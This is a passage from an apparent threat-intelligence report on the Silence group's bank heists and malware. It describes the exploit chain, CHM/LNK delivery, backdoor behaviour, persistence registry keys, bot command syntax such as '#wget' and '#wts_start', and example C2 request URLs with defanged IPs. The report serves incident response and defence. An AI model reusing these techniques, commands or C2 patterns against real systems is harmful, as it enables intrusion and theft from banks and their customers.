attacks using the Perl IRC bot\r\nand public IRC chats to control Trojans.\r\nIn 2018, hackers attacked via card processing. They successfully withdrew over\r\n$550,000 in one weekend through the ATMs of the bank’s partner.\r\nIn April 2018, the group returned to the proven method and withdrew funds again\r\nthrough ATMs. During a single night they siphoned about $150,000.\r\nAWS CBR\r\nAt the moment of the Incident Response to the first attack in 2016, the shared\r\ndirectory, where payment batches for AWS CBR were uploaded, was accessible\r\nfrom workstations of 2 employees. They worked with correspondent accounts,\r\nso these were the server with the above-mentioned directory and the terminal\r\nserver. Below is a chain of events that we have built through incident response.\r\nOn 13.06.2016, the hackers used an administrator account and domain controller\r\nto install winexesvc service. This service was launched as an OS service from the\r\nC:\\Windows\\winexesvc.exe file. This service allows remote execution of commands\r\nlaunched in GNU/Linux systems on computers with Windows using SMB protocol.\r\nPresumably, the account was compromised using Mimikatz program or its variant,\r\nalthough there were no signs of its operation.\r\nOn 06.07.07.2016, the criminals attempted to steal money from AWS CBR of\r\nthe bank. Group-IB experts believe that the attackers experienced a machine\r\nerror during the processing of a payment batch in AWS CBR with the purpose of\r\nspoofing the payment details. After this, the bank’s security team tried to stop\r\nthe second intrusion of the attackers. Despite their attempts, on 19.07.2016, the\r\nwinexesvc service was repeatedly installed on the servers and workstations. This\r\ntime, the criminals used a system administrator account.\r\nOn 30.07.2016, the remote control software RAdmin was installed on the server\r\nwith a directory. The software worked covertly in the svchost.exe file. This\n\n27\r\nsoftware allowed the attacker to have round-the-clock access to the bank’s\r\nnetwork, because the server was virtual and worked 24\\7.\r\nOn 01.08.2016, the hackers installed the patched backdoor Kikothac, netsrvc32.\r\nexe, on one of the employee’s computers. This software allowed execution of files\r\nand commands, received from the C\u0026C server with the following IP: 193.169.245[.]89.\r\nOn 02.08.2016, a piece of software, svchost.exe or RAdmin, was installed on this\r\nvery PC. The software was not detected by the installed anti-malware solution\r\nused in the bank. Then, the file for reconciliation of payments (downloaded from\r\nthe automated banking system with the payments that were to be uploaded\r\nto AWS CBR) was changed (compromised). AWS CBR was installed by the bank’s\r\nsecurity team to fight theft.\r\nIn addition, the computer was found to contain mss.exe, which is a\r\nSilence.SurveillanceModule, which spies on the user’s desktop. This way, the\r\nattackers tried to find out how an operator works to fix their mistakes and\r\nconduct a fraudulent transaction.\r\nThis theft was prevented because the bank decided to engage Group-IB\r\ninformation security and incident response experts. Unfortunately, we did not\r\nmanage to restore the full course of events, because in an attempt to clean the\r\nnetwork, the bank’s IT team deleted the majority of the attacker’s traces.\n\nSilence\r\nMoving into the darkside\r\n28\r\nATMs\r\nSilence.Downloader\r\nMalicious.doc\r\nOR\r\nMalicious.chm\r\nC\u0026C Server\r\nSilence\r\nMainModule\r\nSilence\r\nSurveilanceModule\r\nProxy\r\nBot\r\ndispense\r\ncommand Atmosphere\r\n.dll\r\nAtmosphere\r\nInjector\r\nAtmosphere\r\nDropper\r\nRADMIN\r\nMule\r\nMoney\r\nMalicious.lnk Malicious.js\r\nATM\r\nOn 10.08.2017, the bank employee received an email to their corporate mailbox\r\nfrom josueruvalcaba@mail[.]com with the following subject: \"Message has been\r\ndisinfected : Double Spending With A Card\". The email contained an attachment\r\ncalled \"Account Statement.docx\". After opening the attachment, an EPS script was\r\nlaunched, which exploited two Microsoft Word vulnerabilities, CVE-2017-0262 and\r\nCVE-2017-0263. This allowed the attackers to create a backdoor in the system and\n\n29\r\nescalate privileges. The employee opened the attachment and despite the anti-malware solution giving a notification of the successful deletion of malicious files,\r\nthe Silence loader was launched.\r\nOn 11.08.2017, this workstation was used to scan a local network using Nmap. As\r\na result, the hackers found vulnerabilities in workstations. The attackers found\r\nWindows-based nodes which were vulnerable to CVE-2008-4250. The vulnerability\r\naffects such operating systems as Microsoft Windows 2000 SP4, XP SP2 and SP3,\r\nServer 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta. These\r\nversions of Windows contain a vulnerability in the server service which allows\r\nremote code execution. It is caused by incorrect processing of the specially\r\ncreated RPC requests. With this vulnerability, the attacker might gain full control\r\nover the system.\r\nExperts identified successful attempts of the anti-malware solution to block the\r\ndownloading of Meterpreter stagers.\r\nIP\r\nhttp http\r\nhttp http\r\nOn the same day, a file called m32.exe was created in the file system of the\r\nworkstation. This file is the Farse utility (a unique Mimikatz-based software\r\nprogram developed by the attackers), which extracts passwords, hashes and PINs.\r\nIn addition, the workstation for using AWS CBR was found to launch procdump.exe,\r\nwhich might have been used to create a copy (dump) of lssas.exe, which, in turn,\r\ncould be used to extract passwords using Mimikatz.\n\nSilence\r\nMoving into the darkside\r\n30\r\nFrom 11.08.2017 to 14.09.2017, the winexesvc service was created. This service\r\nallows remote execution of commands launched in GNU/Linux systems, on\r\ncomputers with Windows using SMB protocol.\r\nOn 07.10.2017, workstations were accessed using standard Microsoft Remote\r\nDesktop Web Access. That said, there was no data on RDP connections in the\r\nWindows system logs on this date. It was probably deleted.\r\nAccording to Radmin Server 3 logs, on 08.10.2017, one of the ATMs was remotely\r\naccessed from a workstation of a bank employee. After this, unique software for\r\ninteraction with the dispenser was installed.\r\nLater, this software made ATMs withdraw all cash at a specific time. The total\r\namount stolen was over $100,000.\r\nWhile investigating the network topology, the hackers gained access to a machine\r\nwith AWS CBR, which is evidenced by the files created on the server. The attackers\r\ngained access to the machine with a domain administrator account and then\r\nconnected to it using RAdmin.\r\nDespite the fact that the machine was connected to AWS CBR, the criminals did\r\nnot use this vector.\r\nIn April 2018, the group withdrew funds again through ATMs. During a single night\r\nthey siphoned about $150,000. This time, the Atmosphere program was not\r\nburdened with redundant features and ran stably without bugs.\r\nCard Processing\r\nIn 2018, in an attack on another bank, the group used the privileged account of\r\na bank employee to change cash withdrawal limits for the previously activated\r\ncards. Later, the mules used the cards to empty the ATMs. The challenge was that\r\nthey were cashing out in ATMs of the partner, not the bank itself. The partner’s\r\nATM had no set limits for withdrawal. The total amount stolen was over $550,000.\n\n31\r\nworkstation Card Processing\r\nIncrease card\r\nlimits\r\nСard with no limits\r\nATM Mule\r\nSilence.Downloader\r\nC\u0026C Server Silence\r\nMainModule\r\nSilence.ProxyBot\r\nFarse\r\nMalicious.doc\r\nOR\r\nMalicious.chm\r\nMalicious.lnk Malicious.js\r\n$\r\nDuring the response to this incident, Group-IB experts found a lot of .bat scripts,\r\nwhich just launched software, cleared logs and generally automated the work. All\r\nsoftware and scripts were saved in the c:\\intel, c:\\atm, and c:\\1 directories.\r\nFor software debugging, the hackers used legitimate Listdlls and RogueKiller\r\ntools, and for deleting traces they used sdelete.exe. They also utilized self-developed software for clearing the RAdmin logs.\n\nSilence\r\nMoving into the darkside\r\n32\r\nTECHNICAL DESCRIPTION OF THE TOOLS\r\nThis section is devoted to the technical analysis of the software and tools used\r\nby Silence to conduct the attacks. In general, there are five groups that can be\r\nidentified:\r\n1. Unique modifications of exploits used to deliver the backdoor loader of\r\nSilence;\r\n2. Unique Silence Trojan, its spying modules and ProxyBot used to connect\r\nisolated segments of the target corporate network and C\u0026C server of the\r\ncriminals. The group also used the patched backdoor Kikothac for some time;\r\n3. Unique set of tools for emptying the ATMs called Atmosphere. It contains the\r\nsoftware to interact with the dispenser and software to inject a malicious\r\nlibrary into the dispenser process;\r\n4. Service software, including legitimate administration tools used by the group\r\nin the attacks.\r\n5. DDoS IRC Bot\r\nAttachments\r\nCVE-2017-262 + CVE-2017-263 APT28 related\r\nFile Name MD5 File Description\r\nContract.docx 57f51443a8d6b8882b0c6af\r\nbd368e40e Microsoft Word file exploitingCVE-2017-0262 vulnerability.\r\nimage1.eps cf9a68ace36f24b80daf9af\r\ne1d7dab44\r\nEPS file\r\njoiner.dll DLL dropper\r\n x32 version of the exploit of\r\nCVE-2017-0263 vulnerability\r\n x64 version of the exploit of\r\nCVE-2017-0263 vulnerability\r\nAfter opening the Contract.docx file from the phishing email, the user will see the\r\nfollowing text in Russian:\n\n33\r\nContract.docx is a .doc file, designed to exploit the CVE-2017-0262 vulnerability\r\nin Microsoft Word. This file contains an EPS script file image1.eps (7d1c38c3cba\r\n1b1ce644d75fa3fd8e65545fdad8b5b21fe630d162cd0bdd87e40). The content\r\nwas encrypted using byte-to-byte XOR with a 7a5d5e20 key. Once decrypted,\r\nit demonstrates code sections with the \"forall\" operator, which indicates the\r\nexploitation of the above-mentioned vulnerability by incorrect processing of EPS\r\nfiles, as well as a shellcode in string format (hereinafter Shell1).\r\nIt is interesting to note that the exploit contains variables with names composed\r\nof lyrics from \"Snuff\" by Slipknot (e.g.You-sold-me-out-to-save-yourself).\r\nThe exploit performs the following actions:\r\n1. It allocates memory in the Microsoft Word process at the address 0x58a80000\r\nand writes a shellcode (hereinafter – Shell2) there. This shellcode is required to\r\nsave and run a backdoor, which is described below. It should be noted that the\r\nfile is stored inside the shellcode.\r\n2. In the Microsoft Word memory space, a section of the code, which is required to\r\nunpack the DLL dropper (hereinafter – Shell3), is decrypted. The exports section\r\nof the DLL contains the \"fork\" function, which is called immediately after\r\nunpacking. The library name is \"joiner.dll\", SHA256: eea57047413bd7ae6b58e3a\r\n3fc4921092920949fd2fd189144ce71d0fa44239d.\n\nSilence\r\nMoving into the darkside\r\n34\r\n3. The \"fork\" function is used to determine the bit count of the infected system\r\nand decrypt the module that exploits the CVE-2017-0263 vulnerability. This\r\nenables the threat actor to gain SYSTEM privileges.\r\n4. The shellcode is called by the address 0x58a80000. This shellcode saves the\r\nWINWORD.exe file (c90df05f360fc6566bd226a2e93d91f10e753e3d9bb4a3c\r\nd9e2c7305c80749f3) to the directory \"C:\\Users\\\u003c%username%\u003e\\AppData\\\r\nRoaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\" under the name\r\n\"WINWORD.exe\". Following this, this backdoor is executed within the WINWORD.\r\nexe process. It should be noted that these actions are performed with SYSTEM\r\nprivileges.\r\nContract.doc\r\nEncrypted\r\nEPS exploit file\r\nDropper\r\nPrivilege escalation\r\nmodules\r\nDecrypted\r\nEPS exploit file\r\nShell3 is decrypted\r\nand written to the address\r\n0x58a80000\r\nShell3 Shell2\r\nBackdoor\r\nShell1\r\nDropper\r\nBackdoor\r\nShell2 is decrypted\r\nand written to the address\r\n0x58a80000\r\nExploit decryption\r\nand launch\r\nBackdoor is saved\r\nto the startup\r\ndirectory and launched\r\nPrivilege escalation,\r\ntransferring control to address\r\n 0x58a80000\r\nGeneral scheme of infection\n\n35\r\nOn May 9, 2017, ESET published a report on the software tools of the APT28\r\ngroup (https://www.welivesecurity.com/2017/05/09/sednit-adds-two-zero-day-exploits-using-trumps-attack-syria-decoy/). The approach to infecting\r\nthe system and features in the investigated case correspond with the ones in\r\nthe published report. However, we found key differences, identifying that APT28\r\nsoftware tools were used by another group to steal money. We noted that in the\r\ncase described by ESET the control was not given to the 0x58a80000 address.\r\nAfter investigating the code of both exploits in more detail, we discovered that\r\nthe code of APT28’s DLL dropper was patched to give control to Shell, which is\r\nnecessary to save the backdoor in a file and launch it. The modified part of the\r\ncode is shown in the image below:\r\nPart of the code of the Fork function in the investigated\r\n(below) and ESET (above) cases\r\nFrom the presented parts of code, it is clear that call and cmp instructions were\r\nreplaced with nop, push, and retn. Instructions like retn and push need 6 bytes\r\n(5 and 1 accordingly), while call and cmp need 8 bytes. The two bytes left were\r\nchanged to nop instruction in the process, which is evidenced by the changes in\r\ndropper at the level of assembler instructions.\r\nCHM\r\nFile Name MD5 File Description\r\nLetter of\r\nIntent.chm\r\ndde658eb388512ee\r\n9f4f31f0f027a7df\r\nCHM file downloads and executes remote\r\nVBS code when opened\r\ni.vbs Remote VBS code, which downloads and\r\nlaunches the Silence loader\r\nrpc32.exe 404d69c8b74d3755\r\n22b9afe90072a1f4\r\nSilence.Downloader\n\nSilence\r\nMoving into the darkside\r\n36\r\nOne of the phishing emails contained a help file called Letter of Intent.chm.\r\nMicrosoft Compiled HTML Help is a Microsoft proprietary online help format,\r\nconsisting of a collection of HTML pages, an index and other navigation tools. The\r\nfiles are compressed and deployed in a binary format with the extension .CHM, for\r\nCompiled HTML. The format is often used for software documentation.\r\nIt was introduced as the successor to Microsoft WinHelp with the release of\r\nWindows 98 and is still supported in Windows 7. Although the format was\r\ndesigned by Microsoft, it has been successfully reverse-engineered and is now\r\nsupported in many document viewer applications.\r\nThis file type is still supported by Microsoft and the software for viewing the help\r\ncontent is still included in the standard Windows package. This format allows the\r\nthreat actor to enable JavaScripts and execute remote VBScript and/or Powershell\r\ncode by calling mshta.exe or powershell.exe.\r\nAlthough the vector is not new and was used even back in 2015 to deliver malware,\r\nthis method of delivering the files of this type is not at all typical for the CIS and,\r\nin some cases, helps to evade discovery and successfully pass through corporate\r\nsecurity systems.\r\nThe Letter of Intent.chm is a compiled HTML file with interactive help. After\r\ndecompiling, the file has the following structure:\r\nWhen launching the help, the entry point is the file called start.htm. In the body of\r\nthis HTML file there is an object with interactive content:\r\nAfter opening the help, the VB script is downloaded from the remote server at\r\n139.99.156[.]100. The script is then launched with the system interpreter mshta.\r\nexe. The VB script, in turn, downloads the Silence.Downloader backdoor, saves it in\r\n$TEMP%\\rpc32.exe and launches it.\n\n37\r\nLNK\r\nThe standard Windows shortcuts (links to files with a .LNK extension) can be used\r\nto download arbitrary programs and send them specific arguments. At the same\r\ntime, an attacker can define which icon to display to deceive regular users. Apart\r\nfrom that, Windows OS does not display a shortcut extension.\r\nstruct LNK {\r\nstruct ShellLinkHeader sShellLinkHeader;\r\nstruct LinkTargetIDList sLinkTargetIDList;\r\nstruct LinkInfo sLinkInfo;\r\nstruct StringData NAME_STRING;\r\nstruct StringData RELATIVE_PATH;\r\nstruct StringData WORKING_DIR;\r\nstruct StringData COMMAND_LINE_ARGUMENTS;\r\nstruct StringData ICON_LOCATION;\r\nstruct ExtraData sExtraData;\r\n} ;\r\n \r\nShortcut Structure\r\nWhen the file is formed in a certain way, PowerShell interpreter can be launched\r\nby sending the prepared script for execution as a parameter.\r\nSilence Trojan\r\nThe unique Trojan used by the group is modular. It consists of the following\r\ncomponents (discovered by Group-IB; there could be more):\r\n• Loader;\r\n• Main module (in the early attacks hackers used a patched backdoor called\r\nKikothac);\r\n• Module for spying on users;\r\n• Proxy.\r\nThe main module can load any other executable file, which doesn’t limit the\r\nsystem’s functionality and gives room to extend features.\r\nNone of the programs are obfuscated.\n\nSilence\r\nMoving into the darkside\r\n38\r\nSilence.Downloader\r\nFile Name MD5 hash\r\nWINWORD.exe\r\nIntelSofts_\u003c%disk serial\r\nnumber%\u003e.exe\r\n5b4417521c71cc89cd3b2fe94ab395b2\r\nc6c84da4f27103db4ff593f4d4f45d95\r\nIntel Security.exe b4313151019b2091cbd27c8810e5c7c5\r\nef0fb10c602e3ee81e3677c83a44b409\r\nSecuritySoftWare a58a830dce460e91217328bdefb25cbe\r\na1e210598820cbb08e269b2dfd96e741\r\nrpc32.exe 404d69c8b74d375522b9afe90072a1f4\r\nb09b8be361cd0e30a70cc4603a31d1ee\r\n3345dde0c827dcbda993f7216a8d7c12\r\nfile.exe 43eda1810677afe6791dd7a33eb3d83c\r\n7d3614df9409da3933637f09587af28c\r\n7d8af1f6cf7d08c0c39e03033585d404\r\n9b037ead562c789620a167af85d32f72\r\npripr.exe 97599e2edc7e7025d5c2a7d7a81dac47\r\n \r\nThe file WINWORD.exe is a backdoor. The program is designed to download\r\nand launch the Silence’s main Trojan. After launching WINWORD.exe, the Trojan\r\nperforms the following activity:\r\n1. It retrieves the serial number of C://. If unsuccessful, finds out the serial\r\nnumber of D://. If unsuccessful for the second time, the malware extracts the\r\nserial number of E://.\r\n2. Then it creates a computable mutex, which is unique for the current machine,\r\nfor interprocess synchronization.\r\n3. The infinite loop is as follows:\r\n• the bot sends GET request every 5 seconds to the 158.69.218[.]119/script.\r\nphp?name=%\u003cdisk serial number\u003e server.\r\n• In response it may receive one of the following commands:\n\n39\r\nCommand Description\r\nfal The software copies itself in C:\\ProgramData under the\r\nname: IntelSofts_\u003cdisk serial number%\u003e.exe. Then it creates\r\na value named IntelSofts (only if it is not yet present) in\r\nC:\\ProgramData\\IntelSofts_\u003cdisk serial number%\u003e.exe in\r\nthe HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\\r\nCurrentVersion\\Run registry key. Deletes C:\\ProgramData\\\r\nIntelSofts_\u003cdisk serial number%\u003e.exe:Zone.Identifier\".\r\nDEL Deletes the above-mentioned value and terminates the\r\napplication\r\n|http\u003cwebsite\r\naddress\u003e\r\nDeletes C:\\ProgramData\\MicrosoftsUpdte.exe and downloads a\r\nfile with a URL, sent by the server. The downloaded file is saved\r\non the infected device in C:\\ProgramData\\MicrosoftsUpdte.\r\nexe. After this, it launches the downloaded file either with the\r\nCreateProcess() function or the ShellExecute() function.\r\n \r\nIt is worth noting that a copy of this file is also saved in\r\nC:\\Users\\\u003c%username%\u003e\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\\r\nPrograms\\Startup under the name WINWORD.exe. This is a result of the execution\r\nof the exploit that installed the software into the system.\r\nWe found several programs of this type at different times. On March 20, 2018, the\r\nSilence loader, which was compiled on March 2, 2018, was uploaded to VirusTotal.\r\nThe new version had only minor changes:\r\n1. bot calls GetModuleHandleA(\"kernel32\") function 5555000 times.\r\nThis cycle is designed to hinder dynamic analysis. Other anti-analysis means\r\nare not present.\r\n2. It retrieves the serial number of C://. If unsuccessful, finds out the serial\r\nnumber of D://. If unsuccessful for the second time, finds out the serial number\r\nof E://. If unsuccessful, assigns the variable that stores the serial number\r\n1110101011.\r\n3. Then it launches an infinite loop of server commands processing and sends\r\nthe following GET request every 120 seconds: 91.207.7[.]86/I/checkinfo.\r\nphp?name=\u003cdiskphp?name=\u003cdisk serial number\u003e\n\nSilence\r\nMoving into the darkside\r\n40\r\n4. Disregarding the result of calling the server, the bot ensures persistence using\r\none of the following approaches:\r\n• Creates its own copy in C:\\ProgramData called Intel Security.exe.\r\n• Creates a value named Intel(R) Common Security and a value of C:\\\r\nProgramData\\Intel Security.exe (if it is not present) in HKEY_CURRENT_\r\nUSER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key.\r\n• Deletes the copy of the file with postfix :Zone.Identifier in C:\\\r\nProgramData\"=.\r\n• In the last version of the bot it did not ensure persistence before receiving\r\nthe fal command.\r\n5. Following this, the bot processes the response. There are several options of\r\nresponse:\r\nCommand Description\r\nDEL Deletes the value of the registry described above and\r\nterminates the application\r\nhttp://\u003cwebsite\r\naddress\u003e\r\nDeletes C:\\ProgramData\\TEMP-DATA-2-34-56-6-23_\u003c%result\r\nof multiplication of GUID field structure%\u003e.exe\" and then\r\ndownloads the file with the URL sent by the server. The\r\ndownloaded file is then saved to the infected device in\r\nC:\\ProgramData\\TEMP-DATA-2-34-56-6-23_\u003c%result of\r\nmultiplication of GUID field structure%\u003e.exe\". After this,\r\nthe file is launched by the CreateProcess function. The bot\r\n\"sleeps\" for 2 seconds before the launch.\r\nWe can see that the fal command was deleted and the name of the file where\r\nSilence will be saved is changed.\r\nPatched Kikothac\r\nFile Name MD5 hash\r\nnetsrvc32.exe 9628d7ce2dd26c188e04378d10fb8ef3\r\n0074d8c3183e2b62b85a2b9f71d4ccd8\r\n440b21958ad0e51795796d3c1a72f7b3\r\nb7f97100748857eb75a6558e608b55df\r\nThe software is classified as Backdoor.Kikothac. The application can transfer\r\ninformation about the infected device, download files, upload files to the C\u0026C\r\nserver, launch and terminate processes, modify registry entries, and execute\r\ncommands in the command interpreter. It uses the IP address 46.183.221[.]89 as a\r\nC\u0026C server. Analysis shows that the application was patched.\n\n41\r\nAction Sequence\r\n• The software uses the SetUnhandledExceptionFilter function to register a\r\nfunction/high-level handler that terminates the bot in case of any error.\r\n• There are 10 stages in the cycle with a 1-second interval. The software calls a\r\nmutex named ServiceHelper#56 0.2.21.0001_srv. If there was an error during the\r\ncall, it tries to create a mutex with this name. If there were no errors 10 times or\r\nmutex creation was unsuccessful, the application is terminated.\r\n• The software uses the StartServiceCtrlDispatcher() service named Microsoft\r\nService Watcher in the context of its own process. The process of service\r\nlaunch:\r\n \r\nAll further actions happen in the service handler, namely:\r\n• The service checks the system time. If it is set to zero, the bot stops working.\r\n• Calls a server with the IP address 46.183.221[.]89. The interaction process can be\r\ndescribed with the following stages:\r\n• Lists user accounts in the registry and looks for the ProxyEnable value in\r\nthe Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings key.\r\nIn case such field is found, it gets the default proxy server and uses it to\r\ncommunicate with the C\u0026C server.\r\n• Reads content of the \u003c%Folder where the bot is located%\u003e\\hostent, where\r\nthere should be a description/identifier of the bot. After that, it sends the\r\ncontent to the C\u0026C server. If the file is not present, the service sends the\r\nfollowing string to the server: \".: No desc :.\".\r\n• Switches to the cycle of receiving and executing commands of the C\u0026C\r\nserver.\r\nWhen receiving data from the server, the bot looks for its own commands (you can\r\nfind the list below). If there were no commands, the bot creates a cmd.exe process\r\nand sends the resulting string to the C\u0026C server. Some bot commands only launch\r\nwith parameters. For this, the function/command handler checks the number of\r\nreceived parameters, where the first parameter is always the command accepted.\n\nSilence\r\nMoving into the darkside\r\n42\r\nBot Commands:\r\nCommand Function Possible Responses Example\r\n#wput Get a file from the infected device. The\r\ncommand accepts 4–5 parameters,\r\nnamely file name, URL, and port.\r\nThe usage of 5 parameters was not\r\ndiscovered.\r\n\"OpenReq failed\" – error during\r\noperation of HttpOpenRequest\r\nfunction.\r\n\"Connect failed\" – error during\r\noperation of InternetConnect\r\nfunction.\r\n\"InetOpen failed\" – error during\r\noperation of InternetOpen function.\r\n\"ERR:2\" – error while reading a file.\r\n\"ERR:1\" – the number of parameters\r\nis not equal to 4 or 5.\r\n#wput\r\nlocalhost\r\n4242 test.txt\r\n#wget Download the file to an infected device.\r\nBot accepts two parameters: URL and\r\nfile name. When /d flag is present, does\r\nnothing. Changes date and time of file\r\ncreation, last access, and last change to\r\nthe date from the similar field \"kernel32.\r\ndll\".\r\n\"ERR:1\" – the number of parameters\r\nis not equal to 3.\r\n\"Save/Get failed\" – error while\r\ndownloading the file.\r\n\"Saved\" – the file is downloaded and\r\nsaved\r\n#wget\r\nhххp://www.\r\nconstitution.\r\norg/usdeclar.\r\ntxt text.txt\r\n#ver Get the bot version. \"0.2.21.0001_srv_i86\" #ver\r\n#p Refresh time of the last response/call to\r\nthe server. The command is meaningless\r\nbecause refreshing is automated and\r\nhappens upon receiving/accepting the\r\nmessage from the server.\r\nNo response #p\r\n#d Stop the bot from calling the server for\r\nan hour and stop the cmd.exe process\r\nlaunched earlier.\r\nNo response #d\r\n#clean Terminate the cmd.exe process launched\r\nearlier.\r\nNo response #clean\r\n#tl Get the list of running processes. The response is a list of launched\r\nprocesses in the following format:\r\nprocess=\u003c%process_name%\u003e\r\npid=\u003c%PID%\u003e prnt=\u003c%Process\r\nPID%\u003e\r\n The example of the response is in\r\nAnnex 1.\r\n#tl\r\n#tk Terminate the process using its PID. \"ERR:1\" – the number of parameters\r\nis not equal to 2.\r\n\"Failed to open process, \u003c%PID%\u003e\" –\r\nfailed attempt to call an application.\r\n\"Killed\" – the process is terminated.\r\n#tk 616\r\n#selfpath Get the path to the module file. If the\r\ncommand does not get the parameter,\r\nit responds with the path to the bot’s\r\nexecutable file.\r\nPath to the file.\r\n \"ERR:3\" – error while calling a\r\nprocess of the application\r\n#self\r\nKernel32\n\n43\r\n#setid Write a parameter string to \u003c%Path to\r\nfolder with the bot%\u003e\\hostent. Change\r\ndate and time of file creation, last\r\naccess, and last change of the bot’s\r\nfile to the date from the similar field\r\n\"kernel32.dll\".\r\nNo response #setid test_\r\nstring\r\n#ctype Get information on proxy. SID=`\u003c%User SID%\u003e`,\r\ncstr=`\u003c%CnC%\u003e:\u003c%Port%\u003e` – in case\r\none of the users has a proxy server\r\nconfigured by default.\r\nNo proxy – if the proxy server is not\r\nconfigured by default for any user of\r\nthe infected machine.\r\n#ctype\r\n#fsredirect Enable/disable filesystem redirection. No response #fsredirect\r\non\r\n#fsredirect\r\noff\r\n#ccc Delete the HKLM\\Software\\\r\nKingKongThai\\cc\\. key from the registry.\r\nThe second transferred parameter\r\nshould be \"yes\" string.\r\n\"Done.\" #ccc yes\r\n#cca Change the value with the name that\r\nis received as a parameter in HKLM\\\r\nSoftware\\KingKongThai\\cc registry key.\r\nThe value changes to 0.\r\n\"ERR:4_2\" – when addressing the\r\nHKLM\\Software\\KingKongThai\\cc\r\nkey was not successful.\r\n\"ERR:4_1\" – if writing a value was\r\nunsuccessful.\r\n\"Done\" – if successful\r\ncca test_val\r\n#ccd Delete the value from the HKLM\\\r\nSoftware\\KingKongThai\\cc\\. registry\r\nkey. The value name is received as a\r\nparameter.\r\n\"ERR:4_2\" – when addressing the\r\nHKLM\\Software\\KingKongThai\\cc\r\nkey was not successful.\r\n\"Done\" – if successful.\r\n#ccd test_val\r\n#ccl Get names of all values in the HKLM\\\r\nSoftware\\KingKongThai\\cc registry key.\r\n\"ERR:4_1\" – when addressing the\r\nHKLM\\Software\\KingKongThai\\cc\r\nkey was not successful.\r\n\"ERR:4_0\" – if an attempt to get\r\ninformation on the registry key was\r\nunsuccessful.\r\nThe data is received in the following\r\nformat:\r\n-----------------\r\n \u003c%value1 name%\u003e\r\n \u003c%value2 name%\u003e\r\n -----------------\r\n#ccl\r\n#wts_enum Get the list of launched process sessions\r\nusing WTS functions.\r\nFor examples, refer to Annex 2 #wts_enum\n\nSilence\r\nMoving into the darkside\r\n44\r\n#wts_start Execute the command. Several strings\r\nare received as parameters:\r\n1) Console – launch on behalf of the\r\nSystem or any other string;\r\n2) Commands.\r\nCommand line ‘\u003c%received\r\ncommand%\u003e’ executed. – if\r\nsuccessful.\r\n\"ERROR: Failed execute ‘\u003c%received\r\ncommand%\u003e’ \u003c%GetLastError\r\nresult%\u003e\" – if not successful.\r\n#wts_start\r\nConsole cmd.\r\nexe ping\r\n127.0.0.1\r\n#help No activity performed\r\nAny other\r\nstring\r\nSend the string to cmd.exe. Output. ipconfig\r\nC\u0026C communications\r\nThe bot uses port 80 to communicate with the server. This port sends encrypted\r\ndata. If the infected device has a proxy server configured by default, the bot uses\r\nit.\r\nThe bot regularly connects to the C\u0026C server. If the connection is not established\r\nin 60 minutes, the bot \"snoozes\" for 5 minutes.\r\nThe traffic between the infected machine and the C\u0026C server is encrypted using\r\na byte-to-byte XOR with a pseudo-random byte generated for each message. The\r\nmessage structure is as follows:\r\n \r\nstruct message {\r\n char key;\r\n char unuseful_1; // -1\r\n char unuseful_2; // 0\r\n int length;\r\n char ciphertext[length];\r\n}\r\n \r\nChanges of C\u0026C IP address in the executable file\r\nThrough analysis of the bot memory, we discovered, apart from the C\u0026C address,\r\nthe address 185.29.9[.]45, which is not used by the program anywhere.[R1] In\r\naddition, both the connectivity function and the standard __NMSG_WRITE\r\nfunction referred to the C\u0026C address. Having researched other versions of this\r\nbot, we found an interesting peculiarity. In the investigated sample, the standard\r\nstring Microsoft Visual C++ Runtime Library was changed to: 46.183.221[.]89\\0 C++\r\nRuntime Library:\n\n45\r\nThe unused address (185.29.9[.]45) is in the same place as in the unchanged\r\nsamples:\r\nThe string with the IP address of the C\u0026C server of the Silence group is longer\r\nthan the C\u0026C address in the original file. Therefore, the usual change of the IP\r\naddress (185.29.9[.]45) in the same place of the executable file leads to incorrect\r\noperation of the software. This was the reason for changing the Microsoft Visual\r\nC++ Runtime Library string and not changing the address string from the original\r\nfile.\r\nThe bot has a relatively simple traffic encryption mechanism, that is why reverse\r\nengineering of the protocol does not take long. This shows that the sample was\r\nchanged manually using the regular HEX editor and was not rebuilt for the new\r\nC\u0026C server.\r\nSilence.MainModule\r\nFile Name MD5 hash\r\nMicrosoftUpdte.exe f1954b7034582da44d3f6a160f0a9322\r\nnetsrvc32.exe cfffc5a0e5bdc87ab11b75ec8a6715a4\r\ndwenole.exe c4f18d40b17e506f42f72b8ff111a614\r\nsrv_cons.exe b43f65492f2f374c86998bd8ed39bfdd\r\na3de4a1e5b66d96183ad42800d6be862\r\nThe file in question, MicrosoftUpdte.exe, is classified as Silence.MainModule and\r\nhas capabilities to execute remote commands covertly, add itself to startup, and\r\ndownload arbitrary files from the network servers.\r\nAfter the launch:\r\n• The file checks for the following registry keys: \"HKCU\\Software\\Microsoft\\\r\nWindows\\CurrentVersion\\Run\" and \"HKLM\\Software\\Microsoft\\Windows\\\r\nCurrentVersion\\Run\". If they are present and there is permission to write in\r\nthese keys, the file adds itself to startup by writing itself in both keys. The\r\nrespective registry entries are as follows:\r\n[HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\r\n\"javaplatform\" = \u003cpath_to_exe\u003e\r\n[HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\r\n\"javaplatform\" = \u003cpath_to_exe\u003e\n\nSilence\r\nMoving into the darkside\r\n46\r\nwhere \u003cpath_to_exe\u003e is the path to exe where the file was launched. The file is\r\nnot moved or copied anywhere else (Silence.Downloader loader has already\r\ndone this during the previous step).\r\n• The bot uses the CreatePipe function to create a pipe, which will be used for\r\ninterprocess communication with other modules\r\n• After that, the bot remains inactive waiting for further commands from the C\u0026C\r\nserver.\r\nNetwork communications are performed using unencrypted connections via Http\r\nland GET requests.\r\nPossible types of connection to C\u0026C:\r\nType of\r\nconnection\r\nDescription Example of client\r\nrequest to С\u0026C\r\nConnect1 Registration http://192.168.19[.]171/index.php?xy=1\r\nConnect2 Commands request http://192.168.19[.]171/index.\r\nphp?xy=2\u0026axy=1234567890\r\nConnect3 Sending return\r\nresults\r\nhttp://192.168.19[.]171/index.php?xy=2\u0026axy=12345\r\n67890\u0026bxy=aaaaabbbbccc\r\n• The first \u003crequest1\u003e request is sent to the C\u0026C server of the following type:\r\nhttp://\u003ccnc\u003e/index.php?xy=1\r\nExample of request:\r\n\"http://192.168.19[.]171/index.php?xy=1\"\r\n• As a 